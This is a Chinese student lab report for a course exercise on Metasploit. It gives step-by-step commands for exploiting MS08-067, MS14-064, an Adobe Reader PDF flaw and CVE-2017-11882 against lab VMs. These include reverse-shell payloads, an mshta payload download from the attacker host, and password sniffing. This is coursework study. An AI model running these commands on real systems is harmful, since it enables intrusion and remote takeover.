2018-2019-2 20165215《网络对抗技术》Exp5 MSF基础应用
实验内容
一个主动攻击实践,如ms08_067;
一个针对浏览器的攻击,如ms11_050;
一个针对客户端的攻击,如Adobe;
成功应用任何一个辅助模块。
实验原理
MSF主要模块:渗透攻击模块(Exploit Modules)、辅助模块(Auxiliary Modules)、攻击载荷(Payload Modules)、空字段模块(Nop Modules)、编码模块(Encoders)、后渗透攻击模块(Post)
查看模块源码的目录:/usr/share/metasploit-framework/modules
本次实验使用的是Exploit Modules和Auxiliary Modules
Exploit Modules:指利用某种漏洞对目标主机进行攻击。渗透就是说攻击者通过目标主机上的一个漏洞将自己的恶意代码注入目标主机的系统,就像白蚁一样,从一个洞慢慢攻破整栋建筑。Auxiliary Modules:帮助渗透测试者在进行渗透攻击之前得到目标系统丰富的情报信息,从而发起更具目标性的精准攻击。它和渗透攻击模块之间的关系就好像观察者和狙击手的关系,前者负责观察网络环境,得到准确的信息;后者就根据收集到的信息进行攻击。
实验步骤
(一)一个主动攻击实践
ms08_067(成功)
原理:攻击者利用受害者主机默认开放的SMB服务端口445,发送恶意资料到该端口,通过MSRPC接口调用Server服务的一个函数,并破坏程序的栈缓冲区,获得远程代码执行(Remote Code Execution)权限,从而完全控制主机。
实验环境
| 计算机 | 系统 | IP地址 |
|---|---|---|
| 主机 | kali | 192.168.1.144 |
| 靶机 | Windows 2000 Universal | 192.168.1.164 |
步骤
1、kali中输入msfconsole进入控制台
2、在msf模式下输入search ms08_067或者search ms08-067查找与其相关的漏洞攻击程序,看到exploit/windows/smb/ms08_067_netapi的信息
3、输入命令use exploit/windows/smb/ms08_067_netapi使用该漏洞攻击程序
4 、输入命令show payloads查找metasploit下的有效攻击荷载(payload)

5、使用命令set payload generic/shell_reverse_tcp设置我们想要用的payload
6、使用show options查看该payload的状态,使用show targets查看可以使用的攻击类型

7、设置参数选项
set RHOST “目标主机的ip”
set LHOST “监听主机的ip”
set target 0 //自动选取
set LPORT “监听主机的端口号”
show options //再次查看payload的状态

8、使用exploit指令开始攻击,攻击成功后获取靶机的shell

(二)一个针对浏览器的攻击
ms14_064(成功)
原理:Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本
实验环境
| 计算机 | 系统 | IP地址 |
|---|---|---|
| 主机 | kali | 192.168.1.144 |
| 靶机 | Windows XP Service Pack3+IE8 | 192.168.1.216 |
步骤
1、kali中输入msfconsole进入控制台
2、在msf模式下输入search ms14_064查找与其相关的漏洞攻击程序,看到exploit/windows/browser/ms14_064_ole_code_execution
3、输入命令use windows/browser/ms14_064_ole_code_execution使用该漏洞攻击程序
4 、输入命令show payloads查找metasploit下的有效攻击荷载(payload)

5、使用命令set payload windows/meterpreter/reverse_tcp设置我们想要用的payload
6、设置参数选项
set SRVHOST 192.168.1.144 //设置攻方IP
set AllowPowerShellPrompt 1 //因为msf中自带的漏洞利用exp调用的是powershell, 所以msf中的exp代码只对安装powershell的系统生效
set LHOST 192.168.1.144
set LPORT 5215
set target 0 //设置winXP靶机

7、使用exploit指令开始攻击

8、将生成的URL地址在winXP的IE中打开,建立了一个会话
9、输入sessions查看会话相关信息
10、输入sessions -i 1即可选择第一个会话,获取shell权限

(三)一个针对客户端的攻击
Adobe(成功)
原理:针对Adobe阅读器9.3.4之前的版本,一个名为SING表对象中一个名为uniqueName的参数造成缓冲区溢出
实验环境
| 计算机 | 系统 | IP地址 |
|---|---|---|
| 主机 | kali | 192.168.1.144 |
| 靶机 | Windows XP Service Pack3+Adobe Reader 9.3 | 192.168.1.164 |
步骤
1、kali中输入msfconsole进入控制台
2、在msf模式下输入search adobe查找与其相关的漏洞攻击程序,看到exploit/windows/browser/adobe_cooltype_sing

3、输入命令use windows/fileformat/adobe_cooltype_sing 使用该漏洞攻击程序
4 、输入命令show payloads查找metasploit下的有效攻击荷载(payload)
5、设置payload和参数选项
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.144
set LPORT 5215
set FILENAME 20165215.pdf

6、使用exploit指令开始攻击,输入back指令退出当前模块

7、将生成的20165215.pdf文件复制到靶机上
8、打开监听模块,设置payloads和参数选项
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.144
set LPORT 5215

9、输入exploit 开始监听
10、将靶机中的pdf文件打开,攻击机成功获取到靶机shell

CVE-2017-11882(成功且唯一)
原理:此漏洞是由Office软件里面的 [公式编辑器] 造成的,由于编辑器进程没有对名称长度进行校验,导致缓冲区溢出,攻击者通过构造特殊的字符,可以实现任意代码执行
实验环境
| 计算机 | 系统 | IP地址 |
|---|---|---|
| 主机 | kali | 192.168.116.140 |
| 靶机 | Windows 7 + office2013 | 192.168.116.130 |
步骤
1、在Github上下载MSF组件“Command109b_CVE-2017-11882.py”、“cve_2017_11882.rtf” 和python脚本“Command109b_CVE-2017-11882.py”
2、将“cve_2017_11882.rb”复制到/usr/share/metasploit-framework/modules/exploits/windows/smb/目录下
3、把下载的“cve_2017_11882.rtf”复制到/usr/share/metasploit-framework/data/exploits/目录下
4、把“Command109b_CVE-2017-11882.py”复制到/root/目录下
5、输入msfconsole进入控制台,然后输入reload_all命令重新加载所有模块
6、输入命令search cve-2017-11882测试虚拟机环境

7、输入命令use /exploits/windows/smb/`cve_2017_11882使用该漏洞攻击模块
8、设置payload和参数选项
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.116.140
set LPORT 5215
set URIPATH test

9、输入exploit开始攻击
10、打开另一终端,输入python Command109b_CVE-2017-11882.py -c "mshta http://192.168.116.140:8080/test" -o kail_help.doc生成word文件

11、把生成的kail_help复制到靶机中打开,是个空白文档

12、回连成功,输入sessions -i 1接管会话,成功获取靶机shell

(四)应用辅助模块的攻击
sniffer(成功)
原理:psnuffle是metasploit中的口令嗅探工具,只有在接入对方网络的初始访问点后才能进行嗅探
实验环境
| 计算机 | 系统 | IP地址 |
|---|---|---|
| 主机 | kali | 192.168.1.144 |
| 靶机 | Windows XP Service Pack3 | 192.168.1.164 |
步骤
1、进入/usr/share/metasploit-framework/modules/auxiliary目录查看有什么项目
2、选择sniffer网络嗅探器,进入目录,发现只有一个psnuffle.rb

3、输入msfconsole进入控制台
4、输入use auxiliary/sniffer/psnuffle使用该工具,并查看详细信息

由上图可知它嗅探的是任意协议,捕获的长度是65535bytes,时间限制是500s
5、设置靶机IP地址set RHOST 192.168.1.216
6、输入run开始运行,在靶机打开浏览器,看到kali捕捉到了这次会话

实验中遇到的问题
问题1:攻击ms08_067漏洞时遇到如下问题

解决方法:确认靶机445端口开启,且模块的targets确实包含Windows XP SP3 Chinese - Traditional (NX),攻击仍然失效,网上有资料称该系统已打上此补丁,最后重新使用其它版本虚拟机进行攻击
基础问题回答
用自己的话解释什么是exploit,payload,encode.
- exploit就是通过漏洞将自己的恶意代码植入目标主机从而达到攻击的目的,指的是一种攻击的手段
- payload相当于是一段恶意代码,或者说是一个装有恶意代码的容器,通过载荷就可以控制目标主机
- encode是编码器,就是通过编码将恶意代码进行封装或伪装,使其不被目标主机检测为恶意程序
离实战还缺些什么技术或步骤
就实验而言,都是靶机主动触发恶意代码使攻击方入侵成功的,而在实际生活中,用户不会随意点击可疑文件、登录可疑网址,因此,我认为如何让用户在无意识地状态下执行恶意代码是攻击能否成功的关键,实验中利用的漏洞都是很久的版本,现在的软件早已打好补丁,因此发现新的漏洞也是实战成功的重要条件。
2018-2019-2 20165215《网络对抗技术》Exp5 MSF基础应用的更多相关文章
- 2018-2019-2 20165205 《网络对抗》 Exp5 MSF基础
2018-2019-2 20165205 <网络对抗> Exp5 MSF基础 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1 ...
- 20155227《网络对抗》Exp5 MSF基础应用
20155227<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:把实现设置好的东西送到要攻击的主机里. ...
- 20155232《网络对抗》Exp5 MSF基础应用
20155232<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是利用可能存在的漏洞对目标进行攻击 ...
- 20155302《网络对抗》Exp5 MSF基础应用
20155302<网络对抗>Exp5 MSF基础应用 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如 ...
- 20155323刘威良《网络对抗》Exp5 MSF基础应用
20155323刘威良<网络对抗>Exp5 MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实 ...
- 20145301 赵嘉鑫 《网络对抗》Exp5 MSF基础应用
20145301 赵嘉鑫 <网络对抗>Exp5 MSF基础应用 一 实验链接 渗透实验一:MS08_067渗透实验 渗透实验二:MS14_064渗透实验 (首用) 渗透实验三:Adobe ...
- 20145215《网络对抗》Exp5 MSF基础应用
20145215<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码 ...
- 20145208 蔡野 《网络对抗》Exp5 MSF基础应用
20145208 蔡野 <网络对抗>Exp5 MSF基础应用 链接地址 主动攻击:利用ms08_067_netapi进行攻击 对浏览器攻击:MS10-002 对客户端攻击:adobe_to ...
- 20145311王亦徐 《网络对抗技术》 MSF基础应用
20145311王亦徐 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,以ms ...
- 20145325张梓靖 《网络对抗技术》 MSF基础应用
20145325张梓靖 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,这里以 ...
随机推荐
- GMA Round 1 空降
传送门 空降 在一块100m*100m的平地上,10位战士从天而降!他们每人会均匀随机地落在这个地图上的一个点. 紧随其后,BOSS随机出现在这个地图上的某一点,然后它会奔向位于左上角的出口,而战士们 ...
- CXF安装和配置时出现Exception in thread "main" java.lang.UnsupportedClassVersionError:异常?
异常信息: C:\Users\>wsdl2java -h Exception in thread "main" java.lang.UnsupportedClassVersi ...
- CSS3_扇形导航_transitionend 事件
扇形导航 圆形按钮,切换一系列图片导航的显示与隐藏. 如果涉及过渡动画,定位的 top 和 left 必须写 Math.sin(弧度) 一圈弧度 = 2π,一圈角度 = 360 弧度 = (deg*2 ...
- 重构file_get_contents实现一个带超时POST传值函数
function wp_file_post_contents($url, $post = null) { $context = array(); if (is_array($post)) { ksor ...
- Java课程课后作业190315之最大连续子数组(二维数组版)
,, 在本周的课堂上,老师再一次提高了要求,将一维数组升级成为了二维数组,然后求出块状的连续子数组. 一开始还想着借鉴之前球一维数组的O(n)的算法,后来还是没有找到头绪,舍友讲了自己的办法,但是没有 ...
- javaweb中的乱码问题(初次接触时写)
javaweb中的乱码问题 在初次接触javaweb中就遇到了乱码问题,下面是我遇到这些问题的解决办法 1. 页面乱码(jsp) 1. 在页面最前方加上 <%@ page language=&q ...
- 阿里云 ACP 考试学习过程分享
目录 考证意义 学习方法 ACP 报名 学习安排[重要] 考试当天 其他 经验贴 考证意义 证多不压身,证比项目经历更具有说服力,证是行业的标准认证.更多时候,是有证的人说,"证其实不重要& ...
- disconf安装问题
安装参考文档:https://blog.csdn.net/fengyao1995/article/details/66491226 主要说说遇到的几个问题 1.在步骤6构建的时候,用jdk1.8,进行 ...
- 解决 ASP.NET Core 自定义错误页面对 Middleware 异常无效的问题
我们基于 Razor Class Library 实现了自定义错误页面的公用类库(详见之前的随笔),但是在实际使用时发现如果在 middleware 中发生了异常,则不能显示自定义错误页面,而是返回默 ...
- sysbench对MySQL的压测
QPS - query per second TPS - transaction per second 不是特别关注,每个业务场景中事务标准是不一样的 Ⅰ.sysbench测试框架 Ⅱ.常用测试脚本 ...